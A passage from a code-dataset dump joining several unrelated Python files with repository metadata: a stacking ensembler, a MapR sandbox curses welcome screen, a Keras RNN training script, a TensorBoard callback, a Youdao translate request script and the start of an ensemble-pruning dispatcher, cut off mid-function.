avg_score, std_score)
logger.info("Saving predictions for level # %d", level)
train_predictions_df = pd.DataFrame(self.train_prediction_dict[level])
train_predictions_df.to_csv(os.path.join(self.save_path, "train_predictions_level_" + str(level) + ".csv"),
index=False, header=None)
return self.train_prediction_dict
    def predict(self, test_data, lentest):
        """Refit every model on the full training data and produce stacked
        test-set predictions, level by level.

        :param test_data: level-0 test features; presumably the same dict
            layout as the training data ({level: [per-model arrays]}) —
            TODO confirm against fit()'s input.
        :param lentest: number of test rows (sizes the prediction matrices).
        :return: dict mapping level -> ndarray of concatenated per-model
            predictions (num_classes columns per model for classification,
            one column per model otherwise).
        """
        self.test_data = test_data
        # For classification each model contributes num_classes probability
        # columns; for regression a single column.
        if self.task_type == 'classification':
            test_prediction_shape = (lentest, self.num_classes)
        else:
            test_prediction_shape = (lentest, 1)
        self.test_prediction_dict = {}
        for level in range(self.levels):
            self.test_prediction_dict[level] = np.zeros((test_prediction_shape[0],
                                                         test_prediction_shape[1] * len(self.model_dict[level])))
        self.test_data = test_data
        for level in range(self.levels):
            # Level 0 consumes the raw features; deeper levels consume the
            # previous level's stacked predictions.
            if level == 0:
                temp_train = self.training_data
                temp_test = self.test_data
            else:
                temp_train = self.train_prediction_dict[level - 1]
                temp_test = self.test_prediction_dict[level - 1]
            for model_num, model in enumerate(self.model_dict[level]):
                logger.info("Training Fulldata Level %d. Model # %d", level, model_num)
                # At level 0 each model has its own feature set (temp_train[0][model_num]).
                if level == 0:
                    model.fit(temp_train[0][model_num], self.y_enc)
                else:
                    model.fit(temp_train, self.y_enc)
                logger.info("Predicting Test Level %d. Model # %d", level, model_num)
                if self.task_type == 'classification':
                    if level == 0:
                        temp_test_predictions = model.predict_proba(temp_test[0][model_num])
                    else:
                        temp_test_predictions = model.predict_proba(temp_test)
                    # Each model owns a num_classes-wide column slice.
                    self.test_prediction_dict[level][:, (model_num * self.num_classes): (model_num * self.num_classes) +
                                                     self.num_classes] = temp_test_predictions
                else:
                    if level == 0:
                        temp_test_predictions = model.predict(temp_test[0][model_num])
                    else:
                        temp_test_predictions = model.predict(temp_test)
                    self.test_prediction_dict[level][:, model_num] = temp_test_predictions
            # Persist each level's predictions for offline inspection.
            test_predictions_df = pd.DataFrame(self.test_prediction_dict[level])
            test_predictions_df.to_csv(os.path.join(self.save_path, "test_predictions_level_" + str(level) + ".csv"),
                                       index=False, header=None)
        return self.test_prediction_dict
# In[ ]:
# specify the data to be used for every level of ensembling:
# Level 0 stacks four models over TF-IDF / count features (tfv/ctv repeated so
# both LR and NB variants see each representation); level 1 stacks an XGBoost
# model over GloVe features plus the level-0 predictions.
train_data_dict = {0: [xtrain_tfv, xtrain_ctv, xtrain_tfv, xtrain_ctv], 1: [xtrain_glove]}
test_data_dict = {0: [xvalid_tfv, xvalid_ctv, xvalid_tfv, xvalid_ctv], 1: [xvalid_glove]}
model_dict = {0: [LogisticRegression(), LogisticRegression(), MultinomialNB(alpha=0.1), MultinomialNB()],
              1: [xgb.XGBClassifier(silent=True, n_estimators=120, max_depth=7)]}
ens = Ensembler(model_dict=model_dict, num_folds=3, task_type='classification',
                optimize=multiclass_logloss, lower_is_better=True, save_path='')
ens.fit(train_data_dict, ytrain, lentrain=xtrain_glove.shape[0])
preds = ens.predict(test_data_dict, lentest=xvalid_glove.shape[0])
# In[ ]:
# check error:
# preds[1] holds the final (level-1) stacked probabilities.
multiclass_logloss(yvalid, preds[1])
| [
"noreply@github.com"
] | zzb5233.noreply@github.com |
77cfdee2094e65250b458eecb25ff296759d160d | 7c1fe2e98fd11d707909463e69ca70dcc18ffe66 | /files/welcome.py | 89b67d2cf308a02487621067cb40e5a86fdf68fb | [] | no_license | jsunmapr/mapr-sandbox-generator | d02162db2b8b30ba455915e18082520c46fdb933 | c590a4aa8fe54de9d5a729824e21bfe585c9d4a0 | refs/heads/master | 2020-12-31T01:36:19.952261 | 2015-05-07T18:12:52 | 2015-05-07T18:12:52 | 35,234,600 | 0 | 0 | null | 2015-05-07T17:48:52 | 2015-05-07T17:48:51 | Shell | UTF-8 | Python | false | false | 3,080 | py | #All Rights Reserved MapR
import curses
import sh
import subprocess
import os
# Module-level curses screen handle; set by main().
screen = None
# Height (in rows) reserved for the bottom hint window.
Width_Factor = 4
# Resolve this host's primary IP via getent/awk (through the `sh` library).
ip = sh.head(sh.awk(sh.getent("ahosts", sh.hostname().strip()),"{print $1}"),n="1").strip()
# /vmware is presumably only present on the VMware-based image — TODO confirm;
# without it we assume a NAT setup reachable only via localhost port forward.
if not os.path.exists("/vmware"):
    ip = "127.0.0.1"
ssh_cmd = ""
if ip == "127.0.0.1":
    ssh_cmd = "ssh mapr@localhost -p 2222"
else:
    ssh_cmd = "ssh mapr@%s" % (ip)
class NetworkMisconfiguredException(Exception):
    """Raised when the sandbox VM's network setup is unusable."""
class ServiceFailedtoStartException(Exception):
    """Raised when a required sandbox service does not come up."""
def make_welcome_window():
    """Draw the top banner window with product name and version."""
    rows, cols = screen.getmaxyx()
    banner = screen.subwin(rows / 2 - Width_Factor - 2, cols, 0, 0)
    banner.box()
    banner.addstr(1, 2, "=== MapR-Platfora-Sandbox-For-Hadoop ===", curses.A_BOLD)
    banner.addstr(3, 2, "Version: 4.0.2")
def make_status_window():
    """Draw the middle window with the access URL and SSH instructions."""
    rows, cols = screen.getmaxyx()
    win = screen.subwin(rows / 2 - Width_Factor / 2, cols, rows / 2 - Width_Factor, 0)
    win.box()
    win.addstr(1, 2, "MapR-Platfora-Sandbox-For-Hadoop installation finished successfully.", curses.A_BOLD)
    win.addstr(2, 2, "Please go to http://%s:8443/ to begin your experience." % ip) #Fixme: Is there a way to detect, how networking is setup on a VM, nat, bridged etc?
    win.addstr(4, 2, "Open a browser on your host machine ")
    win.addstr(5, 2, "and enter the URL in the browser's address field.")
    win.addstr(7, 2, "You can access the host via SSH by %s" % ssh_cmd)
    # HUE credentials only apply when the HUE package is installed.
    if os.path.exists("/opt/mapr/hue"):
        win.addstr(8, 2, "The following credentials should be used for MCS & HUE - mapr/mapr")
def make_hint_window():
    """Draw the bottom window with the console-login key hint."""
    rows, cols = screen.getmaxyx()
    hint = screen.subwin(Width_Factor, cols, rows - Width_Factor, 0)
    hint.box()
    hint.addstr(1, 1, "Log in to this virtual machine: Linux/Windows <Alt+F2>, Mac OS X <Option+F5>")
def init_screen():
    """(Re)draw all three sub-windows on the current curses screen."""
    curses.noecho()
    make_welcome_window()
    make_status_window()
    make_hint_window()
def show_netinfo():
    """Dump basic network diagnostics to /tmp/netinfo and page through it with less."""
    commands = [
        "route -n",
        "getent ahosts",
        "ip addr",
        "cat /etc/resolv.conf",
        "cat /etc/hosts",
    ]
    # 'with open(...)' replaces the removed-in-Python-3 'file()' builtin and
    # guarantees the handle is flushed/closed before 'less' reads the file.
    with open("/tmp/netinfo", "w") as f:
        for cmd in commands:
            f.write("==== %s ==== \n" % cmd)
            f.write(subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).communicate()[0])
            f.write("\n")
    subprocess.call("less /tmp/netinfo", shell=True)
def main():
    """Run the curses welcome screen; 'n' shows network info, Ctrl-C is ignored."""
    global screen
    screen = curses.initscr()
    init_screen()
    screen.refresh()
    curses.curs_set(0)
    import sys
    # '-s' = single-shot mode: show the screen once and exit on any key.
    if len(sys.argv)>1 and sys.argv[1] == "-s":
        screen.getch()
    else:
        while True:
            try:
                c = screen.getch()
                if c == ord('n'):
                    # Leave curses, run the pager, then rebuild the screen.
                    curses.endwin()
                    show_netinfo()
                    screen = curses.initscr()
                    init_screen()
                    screen.refresh()
            # NOTE: Python-2-only except syntax; Ctrl-C is deliberately swallowed
            # so the welcome screen cannot be dismissed accidentally.
            except KeyboardInterrupt, e:
                pass
    curses.endwin()
if __name__ == '__main__':
    main()
| [
"jsun@mapr.com"
] | jsun@mapr.com |
8a42618209e10302a03f5103172cce045ca6d684 | 7ba571fba2a15f1e1da98ec996776549d6897696 | /trainings/Baseline_RNN_Y10/TR014_MV03R00_OV01R00_DP02R00_riskm_full.py | d02df016ad13a85dd44dd28620095c1fbb8369aa | [] | no_license | schorscho/RiskM | 8b1ca176bf24c216a0bc6c1045a3daba94ec2a76 | 57dd3f0be5afafc99da79978cc9328db45e515e2 | refs/heads/master | 2020-03-11T20:48:12.368465 | 2018-05-07T08:51:35 | 2018-05-07T08:51:35 | 130,244,554 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,277 | py | import sys
import os
import pickle
from time import time
from math import sqrt
from shutil import copyfile
import numpy as np
import pandas as pd
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from sklearn.metrics import mean_squared_error
from sklearn.preprocessing import StandardScaler
from keras.callbacks import Callback, LearningRateScheduler
from keras.layers import Input, Dense, CuDNNGRU, Bidirectional
from keras.models import Model, load_model
from keras.utils import multi_gpu_model
from keras.utils.vis_utils import plot_model
from riskm_config import RMC, time_it, logger
from data_preparation import load_all_data
def build_keras_model():
    """Build the RNN regressor: 3 stacked BiGRU layers, 3 dense layers, scalar output."""
    inputs = Input(shape=(RMC.INPUT_LEN, RMC.INPUT_DIM), name='Input_Sequence')
    x = Bidirectional(CuDNNGRU(units=600, return_sequences=True, name='RNN_1'))(inputs)
    x = Bidirectional(CuDNNGRU(units=600, return_sequences=True, name='RNN_2'))(x)
    # Last recurrent layer collapses the sequence to a single vector.
    x = Bidirectional(CuDNNGRU(units=600, name='RNN_3'))(x)
    x = Dense(600, name='Dense_1')(x)
    x = Dense(300, name='Dense_2')(x)
    x = Dense(200, name='Dense_3')(x)
    x = Dense(1, name='Prediction')(x)
    return Model(inputs, x)
def lr_schedule(ep):
    """Step-decay learning rate: base 0.001 divided by (1 + epoch // 10)."""
    new_rate = 0.001 / (ep // 10 + 1)
    logger.info('New learning rate: %01.10f', new_rate)
    return new_rate
def compile_keras_model(model):
    """Compile the model (MSE loss, MAPE metric), wrapping it for multi-GPU
    data parallelism when RMC.GPUS > 1.

    Returns the compiled (possibly multi-GPU-wrapped) model; callers must use
    the returned object, not the argument.
    """
    #adam = Adam(lr=0.001, beta_1=0.9, beta_2=0.999, decay=0.00, clipnorm=1.0) #epsilon=None (doesn't work)
    if RMC.GPUS > 1:
        model = multi_gpu_model(model, gpus=RMC.GPUS)
    # Default Adam optimizer; the tuned configuration above was abandoned.
    model.compile(optimizer='adam', loss='mse', metrics=['mape'])
    return model
def create_feature_prep_pipeline():
    """Return a fresh, unfitted feature scaler (zero mean / unit variance)."""
    return StandardScaler()
def apply_feature_prep_pipeline(x, fpp, fit):
    """Scale sequence features with `fpp` and return them in sequence layout.

    :param x: array reshapeable to (samples, RMC.INPUT_LEN, RMC.INPUT_DIM).
    :param fpp: an sklearn-style scaler (fit_transform/transform).
    :param fit: when True, fit the scaler on `x` before transforming.
    :return: scaled array of shape (samples, RMC.INPUT_LEN, RMC.INPUT_DIM).
    """
    # Scalers operate on 2-D data: flatten every timestep to a feature row.
    # (The debug print() calls that traced shapes on every call were removed.)
    x = x.reshape(-1, RMC.INPUT_DIM)
    if fit:
        x = fpp.fit_transform(x)
    else:
        x = fpp.transform(x)
    # Restore the (samples, timesteps, features) layout.
    x = x.reshape(-1, RMC.INPUT_LEN, RMC.INPUT_DIM)
    return x
def load_feature_prep_pipeline(model_dir, model_file):
    """Unpickle the feature-prep pipeline from <model_dir>/<model_file>_fpp.p.

    Uses a context manager so the file handle is closed; the original passed
    an anonymous open() result to pickle.load and leaked the handle.
    """
    with open(os.path.join(model_dir, model_file + '_fpp.p'), 'rb') as fh:
        return pickle.load(fh)
def save_feature_prep_pipeline(fpp, model_dir, model_file):
    """Pickle `fpp` to <model_dir>/<model_file>_fpp.p.

    Uses a context manager so the file is flushed and closed; the original
    passed an anonymous open() result to pickle.dump and leaked the handle.
    """
    with open(os.path.join(model_dir, model_file + '_fpp.p'), 'wb') as fh:
        pickle.dump(fpp, fh)
def previous_keras_model_file_exists(model_dir, model_file_name):
    """Return True if a saved model file <model_file_name>_model.h5 exists in model_dir."""
    candidate = os.path.join(model_dir, model_file_name + '_model.h5')
    return os.path.exists(candidate)
def load_keras_model(model_dir, model_file_name):
    """Load and return the Keras model saved as <model_file_name>_model.h5."""
    model = load_model(os.path.join(model_dir, model_file_name + '_model.h5'))
    return model
def save_keras_model(model, model_dir, model_file_name):
    """Save `model` (architecture + weights) as <model_file_name>_model.h5."""
    model.save(os.path.join(model_dir, model_file_name + '_model.h5'))
def save_training_history(history, model_dir, model_file_name):
    """Persist a Keras History as a CSV table and a log-scale loss plot (PNG)."""
    hist = pd.DataFrame.from_dict(history.history)
    # 1-based epoch index as the CSV index column.
    hist['epoch'] = [i + 1 for i in range(len(hist))]
    hist.set_index('epoch', inplace=True)
    hist.to_csv(path_or_buf=os.path.join(model_dir, model_file_name + '_history.csv'))
    # NOTE(review): draws on pyplot's implicit global figure and never closes
    # it — repeated calls in one process would accumulate onto the same axes.
    plt.plot(hist['loss'])
    plt.plot(hist['val_loss'])
    plt.yscale('log')
    plt.title('Model Loss')
    plt.ylabel('Loss')
    plt.xlabel('Epoch')
    plt.legend(['Train', 'Test'], loc='upper right')
    fig = plt.gcf()
    fig.set_size_inches(12, 8)
    fig.savefig(os.path.join(model_dir, model_file_name + '_history.png'), dpi=100)
def save_model_graph_and_summary(model, model_dir, model_file_name):
    """Write the model's graph plot (PNG) and text summary next to the model file."""
    graph_path = os.path.join(model_dir, model_file_name + '_model.png')
    summary_path = os.path.join(model_dir, model_file_name + '_model.txt')
    plot_model(model, to_file=graph_path, show_shapes=True)
    with open(summary_path, 'w') as out:
        model.summary(print_fn=lambda line: out.write(line + '\n'))
# def save_validation_results():
# # This is because we deleted scenario 2053 (index 2052 in numpy array) from data set
# val_i[val_i > 2051] += 1
#
# test_result = pd.DataFrame(
# {RMC.SCEN_ID_COL: val_i + 1, 'y': y, 'y_pred': y_p, 'Difference': y - y_p, 'Deviation': (y - y_p) * 100 / y})
# test_result.set_index(RMC.SCEN_ID_COL, inplace=True)
# test_result.sort_index(inplace=True)
#
# skl_mse = mean_squared_error(y, y_p)
# skl_rmse = sqrt(skl_mse)
#
# if model_file_name is not None:
# with open(os.path.join(model_dir, model_file_name + '_train_results.csv'), "w") as file:
# file.write("Best Epoch: {0}, Val MSE: {1}, Val RMSE: {2}\n".format(mt_callback.best_epoch, skl_mse, skl_rmse))
# file.write("\n")
# test_result.to_csv(path_or_buf=file, columns=['y', 'y_pred', 'Difference', 'Deviation'])
# file.write(",,,, {0}\n".format(np.mean(np.absolute(y - y_p) * 100 / y)))
def copy_this_file(model_dir, model_file_name):
    """Archive this training script alongside the model artifacts for reproducibility."""
    source_path = os.path.join(RMC.SRC_DIR, RMC.THIS_FILE + '.py')
    target_path = os.path.join(model_dir, model_file_name + '_' + RMC.THIS_FILE + '.py')
    copyfile(source_path, target_path)
class Model_Tracker(Callback):
    """Keras callback that keeps only the best-so-far model (lowest val_loss) on disk."""

    def __init__(self, model_dir, model_file_name, model):
        # Fix: the original called super(Callback, self).__init__(), which
        # resolves *past* Callback and silently skips Callback.__init__.
        super(Model_Tracker, self).__init__()
        self.model = model
        self.file_name = model_file_name
        self.dir = model_dir
        self.best_epoch = None      # epoch index of the best val_loss seen
        self.best_val_loss = None   # lowest val_loss seen so far

    def on_epoch_end(self, epoch, logs=None):
        val_loss = logs['val_loss']
        if self.best_val_loss is None or self.best_val_loss > val_loss:
            self.best_epoch = epoch
            self.best_val_loss = val_loss
            save_keras_model(self.model, self.dir, self.file_name)
            print("New model version saved - val_rmse ({:.6f})".format(sqrt(val_loss)))
def execute_train(model_dir, model_file_name, start_epoch, end_epoch, fpp, build_on_model,
                  train_x, train_y, train_i, val_x, val_y, val_i):
    """Train the model (fresh or resumed), tracking the best checkpoint and
    writing history/graph/results artifacts to `model_dir`.

    :param fpp: feature-prep pipeline; None means create and fit a new one.
    :param build_on_model: existing compiled model to continue from, or None.
    :param train_i/val_i: scenario indices for reporting; NOTE val_i is
        mutated in place below.
    :return: (fpp, model) — the (possibly newly fitted) pipeline and model.
    """
    # Fit the scaler only when it was created here; a loaded pipeline is reused as-is.
    if fpp is None:
        fpp = create_feature_prep_pipeline()
        fit = True
    else:
        fit = False
    x_t = apply_feature_prep_pipeline(x=train_x, fpp=fpp, fit=fit)
    y_t = train_y
    x_v = apply_feature_prep_pipeline(x=val_x, fpp=fpp, fit=False)
    y_v = val_y
    logger.info('Building/compiling model ...')
    if build_on_model is None:
        model = build_keras_model()
        model = compile_keras_model(model)
    else:
        model = build_on_model
    callbacks = [LearningRateScheduler(lr_schedule)]
    mt_callback = None
    # Artifacts (checkpointing, graph, pipeline, script copy) only when a name is given.
    if model_file_name is not None:
        mt_callback = Model_Tracker(model_dir, model_file_name, model=model)
        callbacks.append(mt_callback)
        save_model_graph_and_summary(model, model_dir, model_file_name)
        save_feature_prep_pipeline(fpp, model_dir, model_file_name)
        copy_this_file(model_dir, model_file_name)
    logger.info('Building/compiling model done.')
    logger.info('Fitting model ...')
    history = model.fit(
        x=[x_t], y=y_t,
        batch_size=RMC.BATCH_SIZE,
        epochs=end_epoch,
        verbose=1,
        callbacks=callbacks,
        shuffle=True,
        initial_epoch=start_epoch,
        steps_per_epoch=None,
        validation_data=[[x_v], y_v])
    if model_file_name is not None:
        save_training_history(history, model_dir, model_file_name)
    # Evaluate the final (last-epoch) model on the validation set.
    y_p = model.predict(x_v, verbose=1)
    y = np.reshape(a=y_v, newshape=(len(y_v),))
    y_p = np.reshape(a=y_p, newshape=(len(y_v),))
    # This is because we deleted scenario 2053 (index 2052 in numpy array) from data set
    # NOTE: mutates the caller's val_i array in place.
    val_i[val_i > 2051] += 1
    test_result = pd.DataFrame(
        {RMC.SCEN_ID_COL: val_i + 1, 'y': y, 'y_pred': y_p, 'Difference': y - y_p, 'Deviation': (y - y_p) * 100 / y})
    test_result.set_index(RMC.SCEN_ID_COL, inplace=True)
    test_result.sort_index(inplace=True)
    skl_mse = mean_squared_error(y, y_p)
    skl_rmse = sqrt(skl_mse)
    if model_file_name is not None:
        with open(os.path.join(model_dir, model_file_name + '_train_results.csv'), "w") as file:
            file.write("Best Epoch: {0}, Val MSE: {1}, Val RMSE: {2}\n".format(mt_callback.best_epoch, skl_mse, skl_rmse))
            file.write("\n")
            test_result.to_csv(path_or_buf=file, columns=['y', 'y_pred', 'Difference', 'Deviation'])
            # Trailing row: mean absolute percentage deviation across scenarios.
            file.write(",,,, {0}\n".format(np.mean(np.absolute(y - y_p) * 100 / y)))
    logger.info('Fitting model done.')
    return fpp, model
def execute_test(fpp, model, test_x, test_y, test_i, model_dir, model_file_name):
    """Evaluate `model` on the test set; print MSE/RMSE and optionally write a
    per-scenario results CSV to `model_dir`.
    """
    logger.info("Testing model ...")
    # Transform only — the pipeline was fitted on training data.
    x = apply_feature_prep_pipeline(x=test_x, fpp=fpp, fit=False)
    y = test_y
    y_p = model.predict(x, verbose=1)
    y = np.reshape(a=y, newshape=(len(y),))
    y_p = np.reshape(a=y_p, newshape=(len(y),))
    # test_i are 0-based scenario indices; report them 1-based.
    test_result = pd.DataFrame(
        {RMC.SCEN_ID_COL: test_i + 1, 'y': y, 'y_pred': y_p, 'Difference': y - y_p, 'Deviation': (y - y_p) * 100 / y})
    test_result.set_index(RMC.SCEN_ID_COL, inplace=True)
    test_result.sort_index(inplace=True)
    skl_mse = mean_squared_error(y, y_p)
    skl_rmse = sqrt(skl_mse)
    print(" - test_skl_mse ({:.6f}), test_skl_rmse ({:.6f})".format(skl_mse, skl_rmse))
    print('\n')
    if model_dir is not None:
        with open(os.path.join(model_dir, model_file_name + '_test_results.csv'), "w") as file:
            file.write("Test MSE: {0}, Test RMSE: {1}\n".format(skl_mse, skl_rmse))
            file.write("\n")
            test_result.to_csv(path_or_buf=file, columns=['y', 'y_pred', 'Difference', 'Deviation'])
            # Trailing row: mean absolute percentage deviation across scenarios.
            file.write(",,,, {0}\n".format(np.mean(np.absolute(y - y_p) * 100 / y)))
def main():
    """Entry point: parse 'train'/'test' from argv (default: train), load data,
    resume a previously saved model when present, then train and/or test.
    """
    overall = time()
    logger.info("Main script started ...")
    train = False
    test = False
    fpp = None
    model = None
    model_file_name = None
    model_dir = None
    for arg in sys.argv[1:]:
        if arg == 'train':
            train = True
        elif arg == 'test':
            test = True
    # No mode given -> train by default.
    if not train and not test:
        train = True
    train_x, train_y, train_i, val_x, val_y, val_i, test_x, test_y, test_i = load_all_data(
        train_set=train,
        val_set=train,
        test_set=test,
        init=False)
    if train or test:
        if RMC.TRN is not None:
            # Model artifacts live in a directory named after the run/version ids.
            model_file_name = '{0}_{1}_{2}_{3}'.format(RMC.TRN, RMC.MV, RMC.OV, RMC.DP)
            model_dir = os.path.join(RMC.OUTPUT_DIR, model_file_name)
            if not os.path.exists(model_dir) and train:
                os.makedirs(model_dir)
            # Resume from a previous checkpoint when one exists.
            if previous_keras_model_file_exists(model_dir, model_file_name):
                logger.info("Loading model ...")
                fpp = load_feature_prep_pipeline(model_dir, model_file_name)
                model = load_keras_model(model_dir, model_file_name)
                logger.info("Loading model done.")
        if train:
            fpp, model = execute_train(model_dir, model_file_name,
                                       start_epoch=RMC.START_EP, end_epoch=RMC.END_EP,
                                       fpp=fpp, build_on_model=model,
                                       train_x=train_x, train_y=train_y, train_i=train_i,
                                       val_x=val_x, val_y=val_y, val_i=val_i)
        if test:
            execute_test(fpp, model, test_x, test_y, test_i, model_dir, model_file_name)
    logger.info("Main script finished in %s.", time_it(overall, time()))
if __name__ == "__main__":
    main()
| [
"georg.opora@gmail.com"
] | georg.opora@gmail.com |
090349fdd15c156fdcb78086468aea359e3a8768 | b00ff7ad874565b3c53ac0d1192c4677ed27a3c9 | /traslation/test2.py | 4c27bcb1676eaa8072b93e2e64b24ae6309da4e1 | [] | no_license | XieYanJY/Python-study | be7dea2262035327baee8d6d65fc661c7e169b25 | 59230675b6ed1280f9c51d5165cf8c397d902c4d | refs/heads/master | 2023-05-28T08:49:21.588035 | 2021-06-10T02:57:43 | 2021-06-10T02:57:43 | 375,550,677 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 888 | py | import requests
import json
word = input('请输入:')
data = {
'i': word,
'from': 'AUTO',
'to':' AUTO',
'smartresult': 'dict',
'client': 'fanyideskweb',
'salt': '16061061122206',
'sign': 'a6f391b5a4a84296714d298f77a75977',
'lts': '1606106112220',
'bv': '33bafbf137bd0b36cd4f1ffa3b0dd45b',
'doctype': 'json',
'version': 2.1,
'keyfrom': 'fanyi.web',
'action': 'FY_BY_REALTlME'
}
def get_page(url):
    """GET the translate endpoint with the module-level `data` payload and
    print the first translated segment.

    Raises SystemExit on a non-OK HTTP status.
    """
    r = requests.get(url, params=data)
    # Fix: the original wrote `exit if not ... else print(...)`, which only
    # *evaluates* the `exit` helper without calling it — a silent no-op.
    if r.status_code != requests.codes.ok:
        raise SystemExit('Request failed with status %s' % r.status_code)
    print('Request Successfully')
    msg = r.json()
    print(msg['translateResult'][0][0]['tgt'])
if __name__ == '__main__':
    # Duplicated smartresult parameters are sent as-is in the query string.
    url = 'https://fanyi.youdao.com/translate?smartresult=dict&smartresult=rule'
    get_page(url)
| [
"wd962464wd@gmail.com"
] | wd962464wd@gmail.com |
e87170f2dc27a46b4824d0f1e382bbe1073e3a92 | 73b99f2ffb5b8de3acfecb0b4bffe744af841f38 | /ef/config/components/spatial_mesh.py | 5896772c850db119fbdda1a0dc6dd3d53f11450f | [
"MIT"
] | permissive | eastwoodknight/ef_python | 2af8374eb33adfa9424469979f33bed330692581 | 1d7efff2ee8caf4c66d8e812ce296f355d2f415f | refs/heads/master | 2020-03-24T17:22:44.814989 | 2018-07-28T16:01:06 | 2018-07-28T16:01:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,055 | py | __all__ = ['SpatialMesh', 'SpatialMeshConf']
from collections import namedtuple
import numpy as np
from ef.config.section import register, ConfigSection
from ef.config.component import ConfigComponent
class SpatialMesh(ConfigComponent):
    """Rectangular simulation volume with a uniform grid step per axis."""

    def __init__(self, size=(10, 10, 10), step=(1, 1, 1)):
        # Builtin `float` replaces the `np.float` alias, which was removed in
        # NumPy 1.24; the resulting dtype (float64) is identical.
        self.size = np.array(size, float)
        self.step = np.array(step, float)

    def visualize(self, visualizer):
        """Draw the volume as a black wireframe box."""
        visualizer.draw_box(self.size, wireframe=True, label='volume', colors='k', linewidths=1)

    def to_conf(self):
        """Convert to the size/step-interleaved config-section representation."""
        X, Y, Z = self.size
        x, y, z = self.step
        return SpatialMeshConf(X, x, Y, y, Z, z)
@register
class SpatialMeshConf(ConfigSection):
    # Config-file section header this class parses/serializes.
    section = "Spatial mesh"
    # Field order interleaves size and step per axis: X, x, Y, y, Z, z.
    ContentTuple = namedtuple("SpatialMeshTuple", ('grid_x_size', 'grid_x_step', 'grid_y_size',
                                                   'grid_y_step', 'grid_z_size', 'grid_z_step'))
    # All six values are parsed as floats.
    convert = ContentTuple(*[float] * 6)
    def make(self):
        """Build a SpatialMesh from the interleaved content tuple
        (even indices = sizes, odd indices = steps)."""
        return SpatialMesh(self.content[::2], self.content[1::2])
| [
"kadivas@jinr.ru"
] | kadivas@jinr.ru |
521d0b159fd5a4aa0f1bd0c079cc755d840d931e | b88c7f892b4ec97a1bfecc1ca15b4014f3d9257e | /nasbench_asr/training/tf/callbacks/tensorboard.py | 9b01e58ff9e6e3631d70715a538096d7d138c970 | [
"Apache-2.0"
] | permissive | akhauriyash/nb-asr | 66b0d1dcf5c769763bb2945c130e17756c523164 | 8889f37081ebbde253da1589d13fe3bc9ccd9ef8 | refs/heads/main | 2023-06-23T05:20:41.390868 | 2021-07-22T20:50:51 | 2021-07-22T20:50:51 | 388,593,693 | 0 | 0 | Apache-2.0 | 2021-07-22T20:50:18 | 2021-07-22T20:50:17 | null | UTF-8 | Python | false | false | 1,029 | py | from nasbench_asr.quiet_tensorflow import tensorflow as tf
class Tensorboard(tf.keras.callbacks.Callback):
    """
    A simple TensorBoard callback: per-batch training metrics (every
    `update_freq` batches) and per-epoch validation metrics, written to
    separate train/ and val/ subdirectories of `log_dir`.
    """
    def __init__(self, log_dir, update_freq=10):
        super().__init__()
        self.log_dir = log_dir
        self.update_freq = update_freq
        self.file_writer_train = tf.summary.create_file_writer(str(log_dir / "train"))
        self.file_writer_val = tf.summary.create_file_writer(str(log_dir / "val"))
        self.step = 0  # global batch counter across epochs

    def on_train_batch_end(self, batch, logs=None):
        logs = logs or {}
        if self.step % self.update_freq == 0:
            with self.file_writer_train.as_default():
                for k, val in logs.items():
                    tf.summary.scalar("batch/" + k, data=val, step=self.step)
        self.step += 1

    def on_epoch_end(self, epoch, logs=None):
        # Guard against logs=None, consistent with on_train_batch_end;
        # Keras may invoke callbacks without a logs dict.
        logs = logs or {}
        with self.file_writer_val.as_default():
            for k, val in logs.items():
                tf.summary.scalar("epoch/" + k, data=val, step=epoch+1)
| [
"l.dudziak@samsung.com"
] | l.dudziak@samsung.com |
a5884ee6e2de27f4e699d752637c75776639e729 | 33b35aee26d4c84e2b065882e9b428d57e1df5fa | /pyensemble/pruning/overall.py | f7090d9b854367b1c271dbf56d49e5b23b8a0ec8 | [] | no_license | eustomaqua/PyEnsemble | 33405039a45f723dbaa2cee0ed6080269e15d82e | 4f3c74beba4c3a6f7ed31e3ada1179166b9292f2 | refs/heads/master | 2020-06-23T09:37:15.605252 | 2020-04-19T04:39:26 | 2020-04-19T04:39:26 | 198,586,714 | 8 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,517 | py | # coding: utf8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from copy import deepcopy
import numpy as np
# from pyensemble.pruning import RANKING_BASED
# from pyensemble.pruning import OPTIMIZATION_BASED
# from pyensemble.pruning import COMPOSABLE_CORE_SETS
# from pyensemble.pruning import AVAILABLE_NAME_PRUNE
from pyensemble.pruning.ranking_based import Early_Stopping as ES
from pyensemble.pruning.ranking_based import KL_divergence_Pruning as KL
from pyensemble.pruning.ranking_based import KL_divergence_Pruning_modify as KLplus
from pyensemble.pruning.ranking_based import Kappa_Pruning as KP
from pyensemble.pruning.ranking_based import Orientation_Ordering_Pruning as OO
from pyensemble.pruning.ranking_based import Reduce_Error_Pruning as RE
from pyensemble.pruning.composable import GMM_Algorithm as GMM
from pyensemble.pruning.composable import Local_Search_Alg as LCS
from pyensemble.pruning.optimization_based import DREP as DREP
from pyensemble.pruning.ranking_based import OEP_inPEP as OEP
from pyensemble.pruning.optimization_based import SEP_inPEP as SEP
from pyensemble.pruning.optimization_based import PEP_inPEP as PEP
from pyensemble.pruning.optimization_based import PEP_modify as PEPplus
#==================================
# Overall interface
#==================================
#----------------------------------
# Overall interface
#----------------------------------
def existing_contrastive_pruning_method(name_pru, yt, y, nb_cls, nb_pru, rho=None, epsilon=1e-3):
    """Dispatch to one of the implemented ensemble-pruning algorithms.

    :param name_pru: one of 'ES','KL','KL+','KP','OO','RE','GMM','LCS',
        'DREP','SEP','OEP','PEP','PEP+'.
    :param yt: individual classifiers' predictions; :param y: true labels.
    :param nb_cls: ensemble size; :param nb_pru: number of members to keep.
    :param rho: pruning rate; defaults to nb_pru / nb_cls when None.
    :param epsilon: tolerance used by the local-search ('LCS') method.
    :return: (yo, P, flag) — deep copies of the pruned predictions and the
        list of kept indices, plus the 'OO'-specific flag (None otherwise).
    """
    # Fix: `rho is None` instead of truthiness, so an explicit rho of 0.0 is
    # honoured rather than silently replaced by the default.
    rho = nb_pru / nb_cls if rho is None else rho
    if name_pru == 'ES':
        yo, P = ES.Early_Stopping(yt, nb_cls, nb_pru)
    elif name_pru == 'KL':
        yo, P = KL.KL_divergence_Pruning(yt, nb_cls, nb_pru)
    elif name_pru == 'KL+':
